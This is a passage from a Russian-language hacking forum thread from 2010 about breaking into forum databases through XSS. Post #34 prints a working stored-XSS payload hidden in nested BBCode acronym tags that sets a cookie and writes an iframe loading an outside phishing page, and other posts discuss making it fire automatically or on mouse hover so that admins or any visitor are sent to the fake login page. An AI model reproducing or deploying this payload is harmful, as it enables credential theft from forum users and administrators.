|
Взлом БД через форум с xss - Базы серверов и брут - Все, что связано с брутом и работой с базами данных |
04.06.2010, 11:56
|
#31
|
|
|
|
Разведчик
|
Регистрация: 20.01.2010
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
|
Re: Взлом БД через форум с xss
Эм, у меня такая трабла - на фейк перекидывает только если навести курсор на подпись, с чем может быть связано?
|
|
|
04.06.2010, 12:08
|
#32
|
|
|
|
Рыцарь
|
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
|
Re: Взлом БД через форум с xss
то что для ие (первый) так и работает, фейк открываеться при наведении курсора.
|
|
|
04.06.2010, 12:15
|
#33
|
|
|
|
Старший сержант
|
Регистрация: 15.08.2009
Сообщений: 218
Популярность: 1020
Сказал(а) спасибо: 196
Поблагодарили 140 раз(а) в 84 сообщениях
|
Re: Взлом БД через форум с xss
Ставьте стандартный скин, увидите подходит под эту тему или нет.
________________
|
|
|
04.06.2010, 14:14
|
#34
|
|
|
|
Разведчик
|
Регистрация: 03.06.2010
Сообщений: 5
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
|
Re: Взлом БД через форум с xss
Появился значек '> но не перекидывает на фейк.Не перекидывало и по вашей тест ссылке (Просто открывался пользователь) пока она не стала недоступной! Косяк оперы ? Vot kod
PHP код:
[acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+1*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://palacheldar.hut2.ru/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]
Пишется <acronym title= При наведении на '>
Последний раз редактировалось SnOoPKa; 04.06.2010 в 14:31.
|
|
|
04.06.2010, 14:48
|
#35
|
|
|
|
Капитан
|
Регистрация: 07.04.2010
Сообщений: 293
Популярность: 4393
Сказал(а) спасибо: 133
Поблагодарили 334 раз(а) в 187 сообщениях
|
Re: Взлом БД через форум с xss
первый код перекидывает автоматом, но не на всех браузерах... на новых версиях он уже не пашет...
зато 2ой код пашет везде, НО чтобы он сработал, надо чтобы по нему провели курсором... балуйтесь...
место кода всегда будет '>
ничего страшного...
|
|
|
04.06.2010, 15:02
|
#36
|
|
|
|
Разведчик
|
Регистрация: 03.06.2010
Сообщений: 5
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
|
Re: Взлом БД через форум с xss
|
|
|
04.06.2010, 15:14
|
#37
|
|
|
|
Разведчик
|
Регистрация: 27.09.2009
Сообщений: 6
Популярность: 14
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 2 сообщениях
|
Re: Взлом БД через форум с xss
|
|
|
Пользователь сказал cпасибо:
|
|
04.06.2010, 15:27
|
#38
|
|
|
|
Капитан
|
Регистрация: 07.04.2010
Сообщений: 293
Популярность: 4393
Сказал(а) спасибо: 133
Поблагодарили 334 раз(а) в 187 сообщениях
|
Re: Взлом БД через форум с xss
так. наоборот
1ый по наведению
2ой автоматом - на последних версиях браузера не пашет...
|
|
|
04.06.2010, 15:48
|
#39
|
|
|
|
Разведчик
|
Регистрация: 03.06.2010
Сообщений: 5
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
|
Re: Взлом БД через форум с xss
|
|
|
04.06.2010, 16:09
|
#40
|
|
|
|
Рыцарь
|
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
|
Re: Взлом БД через форум с xss
|
|
|
04.06.2010, 16:18
|
#41
|
|
|
|
Капитан
|
Регистрация: 08.04.2010
Сообщений: 279
Популярность: 654
Сказал(а) спасибо: 126
Поблагодарили 277 раз(а) в 113 сообщениях
|
Re: Взлом БД через форум с xss
Он имеет ввиду, что там я так понял одни акки только персов, админов акка нету? Так я понял?
|
|
|
04.06.2010, 16:23
|
#42
|
|
|
|
Пехотинец
|
Регистрация: 18.03.2010
Сообщений: 76
Популярность: 156
Сказал(а) спасибо: 18
Поблагодарили 135 раз(а) в 53 сообщениях
|
Re: Взлом БД через форум с xss
________________
698-1-896 При себе иметь 10+ сообщений. пишем сразу по делу Раздаю свой парсер для slil.ru тут
|
|
|
04.06.2010, 16:33
|
#43
|
|
|
|
Разведчик
|
Регистрация: 12.12.2009
Сообщений: 24
Популярность: 149
Сказал(а) спасибо: 143
Поблагодарили 19 раз(а) в 9 сообщениях
|
Re: Взлом БД через форум с xss
Можно просто создать темку на форуме и любой вошедший будет перенапрвлен на фейк,я так понял,что можно и не только от админа получить пароль и логин)
Последний раз редактировалось sunches; 04.06.2010 в 16:37.
|
|
|
04.06.2010, 16:35
|
#44
|
|
|
|
Пехотинец
|
Регистрация: 18.03.2010
Сообщений: 76
Популярность: 156
Сказал(а) спасибо: 18
Поблагодарили 135 раз(а) в 53 сообщениях
|
Re: Взлом БД через форум с xss
________________
698-1-896 При себе иметь 10+ сообщений. пишем сразу по делу Раздаю свой парсер для slil.ru тут
|
|
|
04.06.2010, 17:04
|
#45
|
|
|
|
Разведчик
|
Регистрация: 02.06.2010
Сообщений: 27
Популярность: 150
Сказал(а) спасибо: 121
Поблагодарили 70 раз(а) в 52 сообщениях
|
Re: Взлом БД через форум с xss
как поставить права 777 подскажи а?
|
|
|
Ваши права в разделе
|
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения
HTML код Выкл.
|
|
|
Заявление об ответственности / Список мошенников
Часовой пояс GMT +4, время: 23:53.
|
|